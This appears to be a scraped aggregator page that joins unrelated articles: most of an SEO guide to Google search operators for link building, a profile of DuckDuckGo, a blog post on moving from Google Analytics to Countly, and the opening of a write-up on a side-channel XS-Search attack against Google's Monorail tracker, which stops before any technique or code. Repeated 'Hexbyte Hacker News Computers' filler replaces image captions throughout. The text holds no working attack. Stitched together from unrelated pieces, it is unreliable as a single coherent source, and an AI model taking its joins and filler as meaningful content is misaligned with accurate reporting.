Have you ever noticed that when an infographic is embedded on a site, the site owner will usually include the word “infographic” in square brackets in the title tag?

Example:

Hexbyte  Hacker News  Computers infographic title tag

Unfortunately, Google search ignores square brackets (even if they’re in quotes).

But Content Explorer doesn’t.

Content Explorer > search query > “AND [infographic]”

Hexbyte  Hacker News  Computers content explorer infographic

As you can see, you can also use advanced operators in CE to search for multiple terms at once. The search above finds results containing “SEO,” “keyword research,” or “link building” in the title tag, plus “[infographic].”

You can export these easily (with all associated metrics), too.

8. Find more link prospects… AND check how relevant they really are

Let’s assume you’ve found a site that you want a link from.

It’s been manually vetted for relevance… and all looks good.

Here’s how to find a list of similar sites or pages:

Hexbyte  Hacker News  Computers related google search operator

This returned ~49 results—all of which were similar sites.

Sidenote.

In the example above, we’re looking for similar sites to Ahrefs’ blog—not Ahrefs as a whole.

want to do the same for specific pages? No problem

Let’s try our link building guide.

Hexbyte  Hacker News  Computers related link building google operator

That’s ~45 results, all of which are very similar. 🙂

Here’s one of the results: yoast.com/seo-blog

I’m quite familiar with Yoast, so I know it’s a relevant site/prospect.

But let’s assume that I know nothing about this site, how could I quickly vet this prospect?

Here’s how:

  1. do a site:domain.com search, and note down the number of results;
  2. do a site:domain.com [niche] search, then also note down the number of results;
  3. divide the second number by the first—if it’s above 0.5, it’s a good, relevant prospect; if it’s above 0.75, it’s a super‐relevant prospect.

Let’s try this with yoast.com.

Here’s the number of results for a simple site: search:

Hexbyte  Hacker News  Computers yoast simple site search

And site: [niche]:

Hexbyte  Hacker News  Computers yoast site niche search

So that’s 3,950 / 3,330 = ~0.84.

(Remember, >0.75 translates to a very relevant prospect, usually)

Now let’s try the same for a site that I know to be irrelevant: greatist.com.

Number of results for site:greatist.com search: ~18,000

Number of results for site:greatist.com SEO search: ~7

(18,000 / 7 = ~0.0004 = a totally irrelevant site)

IMPORTANT! This is a great way to quick eliminate highly‐irrelevant tactics, but it’s not foolproof—you will sometimes get strange or unenlightening results. I also want to stress that it’s certainly no replacement for manually checking a potential prospect’s website. You should ALWAYS thoroughly check a prospects site before reaching out to them. Failure to do that = SPAMMING.

Here’s another way to find similar domains/prospects…

Site Explorer > relevant domain > Competing Domains

For example, let’s assume I was looking for more SEO‐related link prospects.

I could enter ahrefs.com/blog into Site Explorer.

Then check the Competing Domains.

Hexbyte  Hacker News  Computers competing domains

This will reveal domains competing for the same keywords.

9. Find social profiles for outreach prospects

Got someone in mind that you want to reach out to?

Try this trick to find their contact details:

Hexbyte  Hacker News  Computers tim soulo google search social profiles

Sidenote.

You

NEED

to know their name for this one. This is usually quite easy to find on most websites—it’s just the contact details that can be somewhat elusive.

Here are the top 4 results:

Hexbyte  Hacker News  Computers tim soulo social profiles

BINGO.

You can then contact them directly via social media.

Or use some of the tips from steps #4 and #6 in this article to hunt down an email address.

10. Find internal linking opportunities

Internal links are important.

They help visitors to find their way around your site.

And they also bring SEO benefits (when used wisely).

But you need to make sure that you’re ONLY adding internal links where relevant.

Let’s say that you just published a big list of SEO tips.

Wouldn’t it be cool to add an internal link to that post from any other posts where you talk about SEO tips?

Definitely.

It’s just that finding relevant places to add such links can be difficult—especially with big sites.

So here’s a quick trick:

Hexbyte  Hacker News  Computers seo tips internal links

For those of you who still haven’t gotten the hang of search operators, here’s what this does:

  1. Restricts the search to a specific site;
  2. Excludes the page/post that you want to build internal links to;
  3. Looks for a certain word or phrase in the text.

Here’s one opportunity I found with this operator:

Hexbyte  Hacker News  Computers seo tips internal link

It took me all of ~3 seconds to find this. 🙂

11. Find PR opportunities by finding competitor mentions

Here’s a page that mentions a competitor of ours—Moz.

Hexbyte  Hacker News  Computers how to use moz

Found using this advanced search:

Hexbyte  Hacker News  Computers competitor search

But why no mention of Ahrefs? 🙁

Using site: and intext:, I can see that this site has mentioned us a couple of times before.

Hexbyte  Hacker News  Computers ahrefs mentions

But they haven’t written any posts dedicated to our toolset, as they have with Moz.

This presents an opportunity.

Reach out, build a relationship, then perhaps they may write about Ahrefs.

Here’s another cool search that can be used to find competitor reviews:

Hexbyte  Hacker News  Computers allintitle review search google

Sidenote.

Because we’re using “allintitle” rather than “intitle,” this will match only results with both the word “review” and one of our competitors in the title tag.

You can build relationships with these people and get them to review your product/service too.

Go even further with Content Explorer

You can also use the “In title” search in Content Explorer to find competitor reviews.

I tried this for Ahrefs and found 795 results.

Hexbyte  Hacker News  Computers competitor review

For clarity, here’s the exact search I used:

review AND (moz OR semrush OR majestic) -site:moz.com -site:semrush.com -site:majestic.com

But you can go even further by highlighting unlinked mentions.

This highlights the sites that have never linked to you before, so you can then prioritise them.

Here’s one site that has never linked to Ahrefs, yet has reviewed our competitor:

Hexbyte  Hacker News  Computers hobo web no link

You can see that it’s a Domain Rating (DR) 79 website, so it would be well worth getting a mention on this site.

Here’s another cool tip:

Google’s daterange: operator is now deprecated. But you can still add a time period filter to find recent competitor mentions.

Just use the inbuilt filter.

Tools > Any time > select time period

Hexbyte  Hacker News  Computers daterange filter competitor mention

Looks like ~34 reviews of our competitors were published in the past month.

Want alerts for competitor mentions in real‐time? Do this.

Alerts > Mentions > Add alert

Enter the name of your competitor… or any search query you like.

Choose a mode (either “in title” or “everywhere”), add your blocked domains, then add a recipient.

Hexbyte  Hacker News  Computers ahrefs alerts mention

Set your internal to real‐time (or whatever interval you prefer).

Hit “Save.”

You will now receive an email whenever your competitors are mentioned online.

12. Find sponsored post opportunities

Sponsored posts are paid‐for posts promoting your brand, product or service.

These are NOT link building opportunities.

Google’s guidelines states the following;

Buying or selling links that pass PageRank. This includes exchanging money for links, or posts that contain links; exchanging goods or services for links; or sending someone a “free” product in exchange for them writing about it and including a link

This is why you should ALWAYS nofollow links in sponsored posts.

But the true value of a sponsored post doesn’t come down to links anyway.

It comes down to PR—i.e., getting your brand in front of the right people.

Here’s one way to find sponsored post opportunities using Google search operators:

Hexbyte  Hacker News  Computers sponsored post results

~151 results. Not bad.

Here are a few other operator combinations to use:

  • [niche] intext:”this is a sponsored post by”
  • [niche] intext:”this post was sponsored by”
  • [niche] intitle:”sponsored post”
  • [niche] intitle:”sponsored post archives” inurl:”category/sponsored-post”
  • “sponsored” AROUND(3) “post”

Sidenote.

The examples above are exactly that—

examples

. There are almost certainly other footprints you can use to find such posts. Don’t be afraid to try other ideas.

Want to know how much traffic each of these sites get? Do this.

Use this Chrome bookmarklet to extract the Google search results.

Batch Analysis > paste the URLs > select “domain/*” mode > sort by organic search traffic

Hexbyte  Hacker News  Computers batch analysis organic search traffic

Now you have a list of the sites with the most traffic, which are usually the best opportunities.

13. Find Q+A threads related to your content

Forums and Q+A sites are great for promoting content.

Sidenote.

Promoting != spamming. Don’t join such sites just to add your links. Provide value and drop the occasional relevant link in there in the process.

One site that comes to mind is Quora.

Quora allow you to drop relevant links throughout your answers.

Hexbyte  Hacker News  Computers quora answer

an answer on Quora with a link to an SEO blog.

It’s true that these links are nofollowed.

But we’re not trying to build links here—this is about PR!

Here’s one way to find relevant threads:

Hexbyte  Hacker News  Computers find quora threads google operator

Don’t limit yourself to Quora, though.

This can be done with any forum or Q+A site.

Here’s the same search for Warrior Forum:

Hexbyte  Hacker News  Computers warrior forum thread search

I also know that Warrior Forum has a search engine optimization category.

Every thread in this category has “.com/search‐engine‐optimization/” in the URL.

So I could refine my search even further with the inurl: operator.

Hexbyte  Hacker News  Computers warrior forum inurl search

I’ve found that using search operators like this allows you to search forum threads with more granularity than most on‐site searches.

Here’s another cool trick…

Site Explorer > quora.com > Organic Keywords > search for a niche‐relevant keyword

You should now see relevant Quora threads sorted by estimated monthly organic traffic.

Hexbyte  Hacker News  Computers Screen Shot 2018 05 07 at 19 39 26

Answering such threads can lead to a nice trickle of referral traffic.

14. Find how often your competitors are publishing new content

Most blogs reside in a subfolder or on a subdomain.

Examples:

This makes it easy to check how regularly competitors are publishing new content.

Let’s try this for one of our competitors—SEMrush.

Hexbyte  Hacker News  Computers competitor blog search

Looks like they have ~4.5K blog posts.

But this isn’t accurate. It includes multi‐language versions of the blog, which reside on subdomains.

Hexbyte  Hacker News  Computers competitor blog subdomains

Let’s filter these out.

Hexbyte  Hacker News  Computers

That’s more like it. ~2.2K blog posts.

Now we know our competitor (SEMrush) has ~2.2K blog posts in total.

Let’s see how many they published in the last month.

Because the daterange: operator no longer works, we’ll instead use Google’s inbuilt filter.

Tools > Any time > select time period

Hexbyte  Hacker News  Computers competitor blog posts month

Sidenote.

Any date range is possible here. Just select “custom.”

~29 blog posts. Interesting.

FYI, that’s ~4x faster than we publish new posts. And they have ~15X more posts than us in total.

But we still get more traffic… with ~2x the value, might I add 😉

Hexbyte  Hacker News  Computers ahrefs vs competitor

Quality over quantity, right!?

You can also use the site: operator combined with a search query to see how much content a competitor has published on a certain topic.

Hexbyte  Hacker News  Computers competitor site topic operator

15. Find sites linking to competitors

Competitors getting links?

What if you could also have them?

Google’s link: operator was officially deprecated in 2017.

But I’ve found that it does still return some results.

Hexbyte  Hacker News  Computers competitor links search

Sidenote.

When doing this, always make sure to exclude your competitors site using the “site” operator. If you don’t, you’ll also see their internal links.

~900K links.

want to see even more links?

Google’s data is heavily sampled.

It likely isn’t too accurate either.

Site Explorer can provide a much fuller picture of your competitor’s backlink profile.

Hexbyte  Hacker News  Computers competitor backlinks site explorer

~1.5 million backlinks.

That’s a lot more than Google showed us.

This is yet another instance where the time period filter can be useful.

Filtering by the last month, I can see that Moz has gained 18K+ new backlinks.

Hexbyte  Hacker News  Computers competitor links month

Pretty useful. But this also illustrates how inaccurate this data can be.

Site Explorer picked up 35K+ links for this same period.

Hexbyte  Hacker News  Computers 35k links site explorer

That’s almost DOUBLE!

Hexbyte Hacker News Computers Final Thoughts

Google advanced search operators are insanely powerful.

You just have to know how to use them.

But I have to admit that some are more useful than others, especially when it comes to SEO. I find myself using site:, intitle:, intext:, and inurl: on an almost daily basis. Yet I rarely use AROUND(X), allintitle:, and many of the other more obscure operators.

I’d also add that many operators are borderline useless unless paired with another operator…

Read More

Hexbyte  Hacker News  Computers Nothing Can Stop Google. DuckDuckGo Is Trying Anyway.

Hexbyte Hacker News Computers Nothing Can Stop Google. DuckDuckGo Is Trying Anyway.

Hexbyte Hacker News Computers

In late November, hotel conglomerate Marriott International disclosed that the personal information of some 500 million customers — including home addresses, phone numbers, and credit card numbers — had been exposed as part of a data breach affecting its Starwood Hotels and Resorts network. One day earlier, the venerable breakfast chain Dunkin’ (née Donuts) announced that its rewards program had been compromised. Only two weeks before that, it was revealed that a major two-factor authentication provider had exposed millions of temporary account passwords and reset links for Google, Amazon, HQ Trivia, Yahoo, and Microsoft users.

These were just the icing on the cake for a year of compromised data: Adidas, Orbitz, Macy’s, Under Armour, Sears, Forever 21, Whole Foods, Ticketfly, Delta, Panera Bread, and Best Buy, just to name a few, were all affected by security breaches.

Meanwhile, there’s a growing sense that the tech giants have finally turned on their users. Amazon dominates so many facets of the online shopping experience that legislators mayhave to rewrite antitrust law to rein them in. Google has been playing fast and loose with its “Don’t Be Evil” mantra by almost launching a censored search engine for the Chinese government while simultaneously developing killer A.I. for Pentagon drones. And we now know that Facebook collected people’s personal data without their consent, had third party deals that would have allegedly made it possible for Spotify and Netflix to look at users’ private messages, fueled fake news and the rise of Donald Trump, and was used to facilitate a genocide in Myanmar.

The backlash against these companies dominated our national discourse in 2018. The European Union is cracking down on anticompetitive practices at Amazon and Google. Both Facebook and Twitter have had their turns in the congressional hot seat, facing questions from slightly confused but definitely irate lawmakers about how the two companies choose what information to show us and what they do with our data when we’re not looking. Worries over privacy have led everyone from the New York Times to Brian Acton, the disgruntled co-founder of Facebook-owned WhatsApp, to call for a Facebook exodus. And judging by Facebook’s stagnating rate of user growth, people seem to be listening.

For Gabriel Weinberg, the founder and CEO of privacy-focused search engine DuckDuckGo, our growing tech skepticism recalls the early 1900s, when Upton Sinclair’s novel The Jungle revealed the previously unexamined horrors of the meatpacking industry. “Industries have historically gone through periods of almost ignorant bliss, and then people start to expose how the sausage is being made,” he says.

Gabriel Weinberg, DuckDuckGo CEO and Founder

This, in a nutshell, is DuckDuckGo’s proposition: “The big tech companies are taking advantage of you by selling your data. We won’t.” In effect, it’s an anti-sales sales pitch. DuckDuckGo is perhaps the most prominent in a number of small but rapidly growing firms attempting to make it big — or at least sustainable — by putting their customers’ privacy and security first. And unlike the previous generation of privacy products, such as Tor or SecureDrop, these services are easy to use and intuitive, and their user bases aren’t exclusively composed of political activists, security researchers, and paranoiacs. The same day Weinberg and I spoke, DuckDuckGo’s search engine returned results for 33,626,258 queries — a new daily record for the company. Weinberg estimates that since 2014, DuckDuckGo’s traffic has been increasing at a rate of “about 50 percent a year,” a claim backed up by the company’s publicly available traffic data.

Just before DuckDuckGo’s entrance sits a welcome mat that reads, “COME BACK WITH A WARRANT.”

“You can run a profitable company — which we are — without [using] a surveillance business model,” Weinberg says. If he’s right, DuckDuckGo stands to capitalize handsomely off our collective backlash against the giants of the web economy and establish a prominent brand in the coming era of data privacy. If he’s wrong, his company looks more like a last dying gasp before surveillance capitalism finally takes over the world.

DuckDuckGo is based just east of nowhere. Not in the Bay Area, or New York, or Weinberg’s hometown of Atlanta, or in Boston, where he and his wife met while attending MIT. Instead, DuckDuckGo headquarters is set along a side street just off the main drag of Paoli, Pennsylvania, in a building that looks like a cross between a Pennsylvania Dutch house and a modest Catholic church, on the second floor above a laser eye surgery center. Stained-glass windows look out onto the street, and a small statue of an angel hangs precariously off the roof. On the second floor, a door leading out to a balcony is framed by a pair of friendly looking cartoon ducks, one of which wears an eye patch. Just before DuckDuckGo’s entrance sits a welcome mat that reads “COME BACK WITH A WARRANT.”

“People don’t generally show up at our doorstep, but I hope that at some point it’ll be useful,” Weinberg tells me, sitting on a couch a few feet from an Aqua Teen Hunger Force mural that takes up a quarter of a wall. At 39, he is energetic, affable, and generally much more at ease with himself than the stereotypical tech CEO. The office around us looks like it was furnished by the set designer of Ready Player One: a Hitchhiker’s Guide to the Galaxy print in the entryway, Japanese-style panels depicting the Teenage Mutant Ninja Turtles in the bathroom, and a vintage-looking RoboCop pinball machine in the break room. There’s even a Lego model of the DeLorean from Back to the Future on his desk. The furniture, Weinberg tells me, is mostly from Ikea. The lamp in the communal area is a hand-me-down from his mom.

Weinberg learned basic programming on an Atari while he was still in elementary school. Before hitting puberty, he’d built an early internet bulletin board. “It didn’t really have a purpose” in the beginning, Weinberg says. The one feature that made his bulletin board unique, he says, was that he hosted anonymous AMA-style question panels with his father, an infectious disease doctor with substantial experience treating AIDS patients. This was during the early 1990s, when the stigma surrounding HIV and AIDS remained so great that doctors were known to deny treatment to those suffering from it. Weinberg says that the free—and private—medical advice made the board a valuable resource for the small number of people who found it. It was an early instance of Weinberg’s interest in facilitating access to information, as well as a cogent example of the power of online privacy: “The ability to access informational resources anonymously actually opens up that access significantly,” he told me over email.

After graduating from MIT in 2001, Weinberg launched a slew of businesses, none of which are particularly memorable. First there was an educational software program called Learnection. (“Terrible name… the idea was good, but 15 years too early,” he says.) Then he co-founded an early social networking company called Opobox, taking on no employees and writing all the code himself. “Facebook just kind of obliterated it,” Weinberg says, though he was able to sell the network to the parent company of Classmates.com for roughly $10 million in cash in 2006.

It was around that time when Weinberg began working on what would become DuckDuckGo. Google had yet to achieve total hegemony over the internet search field, and Weinberg felt that he could create a browser plugin that might help eliminate the scourge of spammy search results in other search engines.

Weinberg bought a billboard in San Francisco that proudly proclaimed, “Google tracks you. We don’t.” The stunt paid off in spades, doubling DuckDuckGo’s daily search traffic.

To build an algorithm that weeded out bad search results, he first had to do it by hand. “I took a large sample of different pages and hand-marked them as ‘spam’ or ‘not spam.’” The process of scraping the web, Weinberg says, inadvertently earned him a visit from the FBI. “Once they realized I was just crawling the web, they just went away,” he says. He also experimented with creating a proto-Quora service that allowed anyone to pose a question and have it answered by someone else, as well as a free alternative to Meetup.com. Eventually, he combined facets of all three efforts into a full-on search engine.

When Weinberg first launched DuckDuckGo in 2008 — the name is a wink to the children’s game of skipping over the wrong options to get to the right one — he differentiated his search engine by offering instant answers to basic questions (essentially an early open-source version of Google’s Answer Box), spam filtering, and highly customizable search results based on user preferences. “Those [were] things that early adopters kind of appreciated,” he says.

At the time, Weinberg says, consumer privacy was not a central concern. In 2009, when he made the decision to stop collecting personal search data, it was more a matter of practicality than a principled decision about civil liberties. Instead of storing troves of data on every user and targeting those users individually, DuckDuckGo would simply sell ads against search keywords. Most of DuckDuckGo’s revenue, he explains, is still generated this way. The system doesn’t capitalize on targeted ads, but, Weinberg says, “I think there’s a choice between squeezing out every ounce of profit and making ethical decisions that aren’t at the expense of society.”

Until 2011, Weinberg was DuckDuckGo’s sole full-time employee. That year, he pushed to expand the company. He bought a billboard in Google’s backyard of San Francisco that proudly proclaimed, “Google tracks you. We don’t.” (That defiant gesture and others like it were later parodied on HBO’s Silicon Valley.) The stunt paid off in spades, doubling DuckDuckGo’s daily search traffic. Weinberg began courting VC investors, eventually selling a minority stake in the company to Union Square Ventures, the firm that has also backed SoundCloud, Coinbase, Kickstarter, and Stripe. That fall, he hired his first full-time employee, and DuckDuckGo moved out of Weinberg’s house and into the strangest-looking office in all of Paoli, Pennsylvania.

Then, in 2013, digital privacy became front-page news. That year, NSA contractor Edward Snowden leaked a series of documents to the Guardian and the Washington Post revealing the existence of the NSA’s PRISM program, which granted the agency unfettered access to the personal data of millions of Americans through a secret back door into the servers of Google, Yahoo, Facebook, Apple, and other major internet firms. Though Google denied any knowledge of the program, the reputational damage had been done. DuckDuckGo rode a wave of press coverage, enjoying placement in stories that offered data privacy solutions to millions of newly freaked-out people worried that the government was spying on them.

“All of a sudden we were part of this international story,” Weinberg says. The next year, DuckDuckGo turned a profit. Shortly thereafter, Weinberg finally started paying himself a salary.

Today, DuckDuckGo employs 55 people, most of whom work remotely from around the world. (On the day I visited, there were maybe five employees in the Paoli office, plus one dog.) This year, the company went through its second funding round of VC funding, accepting a $10 million investment from Canadian firm OMERS. Weinberg insists that both OMERS and Union Square Ventures are “deeply interested in privacy and restoring power to the non-monopoly providers.” Later, via email, Weinberg declined to share DuckDuckGo’s exact revenue, beyond the fact that its 2018 gross revenue exceeded $25 million, a figure the company has chosen to disclose in order to stress that it is subject to the California Consumer Privacy Act. Weinberg feels that the company’s main challenge these days is improving brand recognition.

“I don’t think there’s many trustworthy entities on the internet, just straight-up,” he says. “Ads follow people around. Most people have gotten multiple data breaches. Most people know somebody who’s had some kind of identity theft issue. The percentage of people who’ve had those events happen to them has just grown and grown.”

The recent investment from OMERS has helped cover the cost of DuckDuckGo’s new app, launched in January 2018. The app, a lightweight mobile web browser for iOS and Android that’s also available as a Chrome plugin, is built around the DuckDuckGo search engine. It gives each site you visit a letter grade based on its privacy practices and has an option to let you know which web trackers — usually ones from Google, Facebook, or Comscore — it blocked from monitoring your browsing activity. After you’ve finished surfing, you can press a little flame icon and an oddly satisfying animated fire engulfs your screen, indicating that you’ve deleted your tabs and cleared your search history.

The rest of the recent investment, Weinberg says, has been spent on “trying to explain to people in the world that [DuckDuckGo] exists.” He continues, “That’s our main issue — the vast majority of people don’t realize there’s a simple solution to reduce their [online] footprint.” To that end, DuckDuckGo maintains an in-house consumer advocacy blog called Spread Privacy, offering helpful tips on how to protect yourself online as well as commentary and analysis on the state of online surveillance. Its most recent initiative was a study on how filter bubbles — the term for how a site like Google uses our data to show us what it thinks we want — can shape the political news we consume.

Brand recognition is a challenge for a lot of startups offering privacy-focused digital services. After all, the competition includes some of the biggest and most prominent companies in the world: Google, Apple, Facebook. And in some ways, this is an entire new sector of the market. “Privacy has traditionally not been a product; it’s been more like a set of best practices,” says David Temkin, chief product officer for the Brave web browser. “Imagine turning that set of best practices into a product. That’s kind of where we’re going.”

Like DuckDuckGo — whose search engine Brave incorporates into its private browsing mode — Brave doesn’t collect user data and blocks ads and web trackers by default. In 2018, Brave’s user base exploded from 1 million to 5.5 million, and the company reached a deal with HTC to be the default browser on the manufacturer’s upcoming Exodus smartphone.

Google knows that I’m in Durham, North Carolina. As far as DuckDuckGo is concerned, I may as well be on the moon

Temkin, who first moved out to the Bay Area in the early ’90s to work at Apple, says that the past two decades of consolidation under Google/Facebook/Netflix/Apple/Amazon have radically upended the notion of the internet as a safe haven for the individual. “It’s swung back to a very centralized model,” he says. “The digital advertising landscape has turned into a surveillance ecosystem. The way to optimize the value of advertising is through better targeting and better data collection. And, well, water goes downhill.”

In companies such as Brave and DuckDuckGo, Temkin sees a return to the more conscientious attitude behind early personal computing. “I think to an ordinary user, [privacy] is starting to sound like something they do need to care about,” he says.

But to succeed, these companies will have to make privacy as accessible and simple as possible. “Privacy’s not gonna win if it’s a specialist tool that requires an expert to wield,” Temkin says. “What we’re doing is trying to package [those practices] in a way that’s empathetic and respectful to the user but doesn’t impose the requirement for knowledge or the regular ongoing annoyance that might go with maintaining privacy on your own.”

In November, I decided to switch my personal search querying to DuckDuckGo in order to see whether it was a feasible solution to my online surveillance woes. Physically making the switch is relatively seamless. The search engine is already an optional default in browsers such as Safari, Microsoft Edge, and Firefox, as well as more niche browsers such as Brave and Tor, the latter of which made DuckDuckGo its default search in 2016.

Actually using the service, though, can be slightly disorienting. I use Google on a daily basis for one simple reason: It’s easy. When I need to find something online, it knows what to look for. To boot, it gives me free email, which is connected to the free word processor that my editor and I are using to work on this article together in real time. It knows me. It’s only when I consider the implications of handing over a digital record of my life to a massive company that the sense of free-floating dread about digital surveillance kicks in. Otherwise, it’s great. And that’s the exact hurdle DuckDuckGo is trying to convince people to clear.

Using DuckDuckGo can feel like relearning to walk after you’ve spent a decade flying. On Google, a search for, say, “vape shop” yields a map of vape shops in my area. On DuckDuckGo, that same search returns a list of online vaporizer retailers. The difference, of course, is the data: Google knows that I’m in Durham, North Carolina. As far as DuckDuckGo is concerned, I may as well be on the moon.

That’s not to say using DuckDuckGo is all bad. For one, it can feel mildly revelatory knowing that you’re seeing the same search results that anyone else would. It restores a sense of objectivity to the internet at a time when being online can feel like stepping into The Truman Show — a world created to serve and revolve around you. And I was able to look up stuff I wanted to know about — how to open a vacuum-sealed mattress I’d bought off the internet, the origin of the martingale dog collar, the latest insane thing Donald Trump did — all without the possibility of my search history coming back to haunt me in the form of ads for bedding, dog leashes, or anti-Trump knickknacks. Without personalized results, DuckDuckGo just needs to know what most people are looking for when they type in search terms and serve against that. And most of the time, we fit the profile of most people.

When I asked Weinberg if he wanted to displace Google as the top search engine in all the land, he demurred. “I mean, I wouldn’t be opposed to it,” he says, “but it’s really not our intention, and I don’t expect that to happen.” Instead, he’d like to see DuckDuckGo as a “second option” to Google for people who are interested in maintaining their online anonymity. “Even if you don’t have anything to hide, it doesn’t mean you want people to profit off your information or be manipulated or biased against as a result [of that information],” he says.

Even though DuckDuckGo may serve a different market and never even challenge Google head-on, the search giant remains its largest hurdle in the long term. For more than a decade, Google has been synonymous with search. And that association is hard, if not impossible, to break.

In the meantime, the two companies are on frosty terms. In 2010, Google obtained the domain duck.com as part of a larger business deal in a company formerly known as Duck Co. For years, the domain would redirect to Google’s search page, despite seeming like something you’d type into your browser while trying to get to DuckDuckGo. After DuckDuckGo petitioned for ownership for nearly a decade, Google finally handed over the domain in December. The acquisition was a minor branding coup for DuckDuckGo — and a potential hedge against accusations of antitrust for Google.

That doesn’t mean relations between the two companies have improved. As the Goliath in the room, Google could attempt to undercut DuckDuckGo’s entire business proposition. Over the past few years, even mainstream players have attempted to assuage our privacy anxieties by offering VPNs (Verizon), hosting “privacy pop-ups” (Facebook), and using their billions to fight against state surveillance in court (Microsoft). With some tweaks, Google could essentially copy DuckDuckGo wholesale and create its own privacy-focused search engine with many of the same protections DuckDuckGo has built its business on. As to whether people would actually believe that Google, a company that muscled its way into becoming an integral part of the online infrastructure by selling people’s data, could suddenly transform into a guardian of that data remains to be seen.

When it comes to the internet, trust is something easily lost and difficult to regain. In a sense, every time a giant of the internet surveillance economy is revealed to have sold out its customers in some innovatively horrifying way, the ensuing chaos almost serves as free advertising for DuckDuckGo. “The world keeps going in a bad direction, and it makes people think, ‘Hey, I would like to escape some of the bad stuff on the internet and go to a safer place,’” Weinberg says. “And that’s where we see ourselves.”

Read More

Hexbyte  Hacker News  Computers On Migrating from Google Analytics

Hexbyte Hacker News Computers On Migrating from Google Analytics

Hexbyte Hacker News Computers

5 min read

In this post we’ll explore what happened when I migrated away from Google Analytics (GA) to a self-hosted solution. The tool that I migrated to is an open-source platform called Countly. It offers a subset of features from what GA offers.

When creating content for this website my typical flow is to first publish a post, then submit it to sites like Hacker News and Reddit, and keep an eye on analytics for a couple days to see how it does. This helps me figure out what my audience find interesting.

There are a few questions that I need an analytics solution to be able to answer for me:

  • What posts are popular this week?
  • How is the site doing compared to last week?
  • Which pages were featured and on which social media platforms?

Spoiler: Neither tool can succinctly answer the third question. Ideally an analytics tool would display an “event”, some sort of marker on the timeline when a certain threshold of traffic from a source is met. I.e. I want to know that “Migrating from WordPress to Static Markdown” was featured on /r/node.

I had already installed Countly on a VPS for keeping track of events generated by a mobile game I published, Cobalt Dungeon (this was a replacement for a massively overpriced event tracking system, Mixpanel). Having it installed was convenient because the server was already up and listening. I simply needed to create another “application” using their multi-tenant-friendly UI and I was ready to go.

Why Migrate

Honestly, it was mostly due to philosophical reasons. The Internet has become increasingly centralized over the years. I really want a website that someone can visit and all the resources are served by domains that I own. With this change I am much closer to that goal (though, most pages have an unobtrusive advertisement, those are still loaded from a third party).

The Migration

The initial installation of Countly isn’t too difficult. They offer a pretty convenient One-Liner Countly Installation script. According to the documentation they suggest a server with 2GB of RAM. I ran Countly on such a server for several months, but eventually downgraded to a server with 1GB of RAM, and haven’t encountered any issues so far.

The server that I use for Countly is a Linode 1GB Nanode VPS @ $5/mo. There’s also an equivalent Digital Ocean 1GB Droplet VPS @ $5/mo. Both of these VPS offerings come with 1TB of transfer, 1 vCPU, and 25GB of SSD, all of which is plenty for an analytics service. DO is getting more popular recently but I chose Linode because I already have a VPS with them for hosting the rest of my projects.

Regardless of where you get your VPS from you should pick the most recent Ubuntu LTS. This will provide maximum compatibility with the install script and should come with plenty of security updates. Run the installer on a fresh installation and everything will be taken care of. You’ll also want to go through the usual DNS and Lets Encrypt SSL setup.

Installing Countly on my site was pretty straightforward. Google Analtyics provides an HTML snippet which can be copied and pasted into the layout of a website. Of course, Countly works the same way.

Right now I’m running the website with both GA and Countly. Once I get more traffic and am satisfied that there aren’t too many discrepancies I’ll shut GA off completely.

What got Better?

First of all, the Countly interface is much more intuitive than Google Analytics. For example it always takes me a few minutes to find the popular page list in GA.

Reduced bandwidth

As far as technical improvements go, the amount of data sent over the wire has decreased. My website already weighs in pretty low, so saving a few KB is a bigger deal with this site than with most sites.

Google Analtyics:

  • /gtag/js 31.95 KB
  • /analtyics.js 17.49 KB
  • collection event 458 B

Countly:

  • countly.min.js 8.08 KB
  • collection event #1 361 B
  • collection event #2 361 B

Hexbyte  Hacker News  Computers Network Traffic: Google Analytics vs. Countly
Network Traffic: Google Analytics vs. Countly

As you can see the difference is fairly high; GA usually consumes over 5x the amount of network traffic (about 50 KB vs 9 KB). Some of my pages only take 150 KB to load, sans analytics, so the savings are pretty nice. Another cool thing about Countly is that I’m able to host the analytics script from the main thomashunter.name domain.

Increased Event Tracking

Here are some numbers tracked over the past week, from December 20th to December 26th:

Countly Google Analytics Diff
Total Sessions 1,633 1,268 +27%
Total Visitors 1,349 1,120 +20%

Countly receives data for at least 20% more users than Google Analytics. Why might that be? I suspect both services keep track of sessions different, and both services perform different bot detection.

But, more likely, the highest contributor is going to be the different ad-blocking tools used by my visitors. These tools usually include a blacklist. Such a blacklist is more likely to contain the ubiquitous googletagmanager.com than my one-off analytics.phobosrising.co. And since my blog caters to a mostly technical audience the odds of them running ad-blocking tools is much higher than the average internet user.

What got Worse?

Some features about Countly are completely broken. The Traffic Sources screen is broken (it thinks everything is “direct” traffic, though this is supposedly fixed in an update). The Versions screen isn’t useful for web (it’s more for application versions). The Devices screen doesn’t seem to know what an Android device is.

Possibly the biggest issue is that it costs more. Google Analytics doesn’t have a monetary fee associated with it. However, the VPS costs $5/month, or $60/year.

Upgrading Countly is a time-consuming endeavor. GA, or any other SaaS solution, is going to be constantly updating itself behind the scenes. Upgrading Countly requires painful database migrations.

The issue which bothers me the least is that Countly displays less information. However, I didn’t use 90% of the information that GA provides, so I’m not too worried about it.

If you’re considering making the switch from one analytics platform to another then I would recommend writing a list of questions you need answered. Then, when evaluating alternatives, make sure the tool satisfies your needs.

Interface Screenshots

Here are a few graphical comparisons between the two tools. I personally find the Countly interface to be a little more modern. It also renders quicker than GA.

Overview

This first view is the overview, or dashboard view, of the system, showing some quick details for the selected timescale.

Hexbyte  Hacker News  Computers Countly Overview
Countly Overview

Note that Countly comes with a Week over Week view. Google Analytics has another screen, containing mostly the same details as in this screenshot, but with a WoW timeline as well.

Hexbyte  Hacker News  Computers Google Overview
Google Overview

Page Listing

These two screens show the highest ranking pages based on popularity for the selected timescale.

Hexbyte  Hacker News  Computers Countly Page Listing
Countly Page Listing

The two screens show basically the same information.

Hexbyte  Hacker News  Computers Google Page Listing
Google Page Listing

Read More

Hexbyte  Hacker News  Computers XS-Searching Google’s bug tracker to find out vulnerable source code

Hexbyte Hacker News Computers XS-Searching Google’s bug tracker to find out vulnerable source code

Hexbyte Hacker News Computers

Or how side-channel timing attacks aren’t that impractical

Monorail is an open-source issue tracker used by many “Chromium-orbiting” projects, including Monorail itself. Other projects include Angle, PDFium, Gerrit, V8, and the Alliance for Open Media. It is also used by Project Zero, Google’s 0-day bug-finding team.

This article is a detailed explanation of how I could have exploited Google’s Monorail issue tracker to leak sensitive information (vulnerable source code files and line numbers) from private bug reports through a XS-Search attack.

Where to start?

One of the first functionalities I looked into when analyzing Monorail was the ability to download the result of a certain search query as a CSV.

